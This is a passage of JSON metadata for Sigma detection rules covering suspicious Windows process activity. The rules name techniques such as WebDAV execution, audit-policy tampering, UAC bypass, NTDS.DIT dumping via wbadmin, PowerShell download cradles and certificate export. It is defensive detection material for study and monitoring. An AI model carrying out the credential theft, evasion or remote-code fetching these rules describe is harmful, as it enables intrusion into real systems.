"https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "value": "Wlrmdr.EXE Uncommon Argument Or Child Process" }, { "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ShadowChasing1/status/1552595370961944576", "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "value": "Suspicious File Execution From Internet Hosted WebDav Share" }, { "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", "meta": { "author": "frack113", "creation_date": "2022-02-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_tor_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.003" ] }, "related": [ { "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "value": "Tor Client/Browser Execution" }, { "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", "meta": { "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "creation_date": "2021-02-02", "falsepositive": [ "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "filename": "proc_creation_win_auditpol_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", "value": "Audit Policy Tampering Via Auditpol" }, { "description": "Detects child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_provlaunch_potential_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f5d1c9a-3e83-48df-95a7-2b98aae6c13c", "value": "Potential Provlaunch.EXE Binary Proxy Execution Abuse" }, { "description": "Detects a copy command or a copy utility execution to or from an Admin share or remote", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "creation_date": "2019-12-30", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_susp_copy_lateral_movement.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1211636381086339073", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.collection", "attack.exfiltration", "attack.t1039", "attack.t1048", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "value": "Copy From Or To Admin Share Or Sysvol Folder" }, { "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", "meta": { "author": "frack113", "creation_date": "2022-05-16", "falsepositive": [ "Legitimate uses of logon scripts distributed via group policy" ], "filename": "proc_creation_win_lolbin_gpscript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e59c230-6670-45bf-83b0-98903780607e", "value": "Gpscript Execution" }, { "description": "Detects execution of \"odbcconf\" with \"REGSVR\" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.", "meta": { "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Legitimate DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized." ], "filename": "proc_creation_win_odbcconf_register_dll_regsvr.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/raspberry-robin/", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70", "value": "New DLL Registered Via Odbcconf.EXE" }, { "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" ], "filename": "proc_creation_win_certutil_export_pfx.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "value": "Certificate Exported Via Certutil.EXE" }, { "description": "Detects usage of Gpg4win to encrypt files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpg4win_encryption.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml" ], "tags": [ "attack.execution" ] }, "uuid": "550bbb84-ce5d-4e61-84ad-e590f0024dcd", "value": "File Encryption Using Gpg4win" }, { "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Legitimate script" ], "filename": "proc_creation_win_dism_remove.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dism_remove.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", "value": "Dism Remove Online Package" }, { "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wbadmin_restore_sensitive_files.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup", "https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/", "https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84972c80-251c-4c3a-9079-4f00aad93938", "value": "Sensitive File Recovery From Backup Via Wbadmin.EXE" }, { "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", "value": "Root Certificate Installed From Susp Locations" }, { "description": "Detects WmiPrvSE spawning a process", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-15", "falsepositive": [ "False positives are expected (e.g. in environments where WinRM is used legitimately)" ], "filename": "proc_creation_win_wmiprvse_spawning_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", "value": "WmiPrvSE Spawned A Process" }, { "description": "Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.\nWindows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.\n", "meta": { "author": "@Kostastsale, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.nettitude.com/blog/introducing-sharpwsus/", "https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1", "https://github.com/nettitude/SharpWSUS", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1210" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b0ce780f-10bd-496d-9067-066d23dc3aa5", "value": "HackTool - SharpWSUS/WSUSpendu Execution" }, { "description": "Detects the execution of rundll32 with a command line that doesn't contain a common extension", "meta": { "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou", "creation_date": "2022-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_uncommon_dll_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1481630810495139841?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "value": "Rundll32 Execution With Uncommon DLL Extension" }, { "description": "Detects the start of a non built-in assistive technology applications via \"Atbroker.EXE\".", "meta": { "author": "Mateusz Wydra, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Legitimate, non-default assistive technology applications execution" ], "filename": "proc_creation_win_atbroker_uncommon_ats_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atbroker_uncommon_ats_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "value": "Uncommon Assistive Technology Applications Execution Via AtBroker.EXE" }, { "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", "value": "UAC Bypass Using Disk Cleanup" }, { "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_uncommon_dir_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6120ac2a-a34b-42c0-a9bd-1fb9f459f348", "value": "AddinUtil.EXE Execution From Uncommon Directory" }, { "description": "Detects events that appear when a user click on a link file with a powershell command in it", "meta": { "author": "frack113", "creation_date": "2022-02-06", "falsepositive": [ "Legitimate commands in .lnk files" ], "filename": "proc_creation_win_susp_embed_exe_lnk.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.x86matthew.com/view_post?id=embed_exe_lnk", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "value": "Hidden Powershell in Link File Pattern" }, { "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", "meta": { "author": "Alexander Rausch", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redmimicry.com/posts/redmimicry-winnti/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1106", "attack.t1059.003", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "value": "HackTool - RedMimicry Winnti Playbook Execution" }, { "description": "Detects suspicious ways to download files or content using PowerShell", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-24", "falsepositive": [ "Scripts or tools that download files" ], "filename": "proc_creation_win_powershell_download_cradles.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1059.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", "value": "PowerShell Web Download" }, { "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Google Drive", "Citrix" ], "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Gal_B1t/status/1062971006078345217", "https://twitter.com/hexacorn/status/1448037865435320323", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "value": "Potential Command Line Path Traversal Evasion Attempt" }, { "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely (at.exe deprecated as of Windows 8)" ], "filename": "proc_creation_win_at_interactive_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "value": "Interactive AT Job" }, { "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_pua_defendercheck.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/matterpreter/DefenderCheck", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.005" ] }, "related": [ { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "value": "PUA - DefenderCheck Execution" }, { "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", "meta": { "author": "Markus Neis @Karneades", "creation_date": "2019-04-03", "falsepositive": [ "AppvClient", "CCM", "WinRM" ], "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", "value": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell" }, { "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", "value": "User Discovery And Export Via Get-ADUser Cmdlet" }, { "description": "Detect filter driver unloading activity via fltmc.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_fltmc_unload_driver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4931188c-178e-4ee7-a348-39e8a7a56821", "value": "Filter Driver Unloaded Via Fltmc.EXE" }, { "description": "Detects the use of powershell commands from headless ConHost window.\nThe \"--headless\" flag hides the windows from the user upon execution.\n", "meta": { "author": "Matt Anderson (Huntress)", "creation_date": "2024-07-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_conhost_headless_powershell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.t1059.001", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 